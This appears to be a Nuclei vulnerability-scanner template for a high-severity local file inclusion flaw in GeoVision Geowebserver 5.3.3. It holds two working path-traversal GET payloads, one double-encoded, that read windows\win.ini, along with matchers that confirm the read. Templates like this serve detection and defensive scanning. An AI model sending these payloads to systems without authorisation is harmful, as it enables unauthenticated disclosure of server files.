id: geowebserver-lfi

info:
  name: GeoVision Geowebserver 5.3.3 - Local File Inclusion
  author: madrobot
  severity: high
  description: GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion.
  reference:
    - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 2
  tags: packetstorm,geowebserver,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini"
      - "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
        part: body

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100f45b58cb50c20c8912b69076ae6fa4986b3a7193d9cc107529d887259042b1b2022078b79722d240466325335caf4bc3aa3eaa0e66cb5029a48cd6e8724eaed456af:922c64590222798bb761d5b6d8e72950
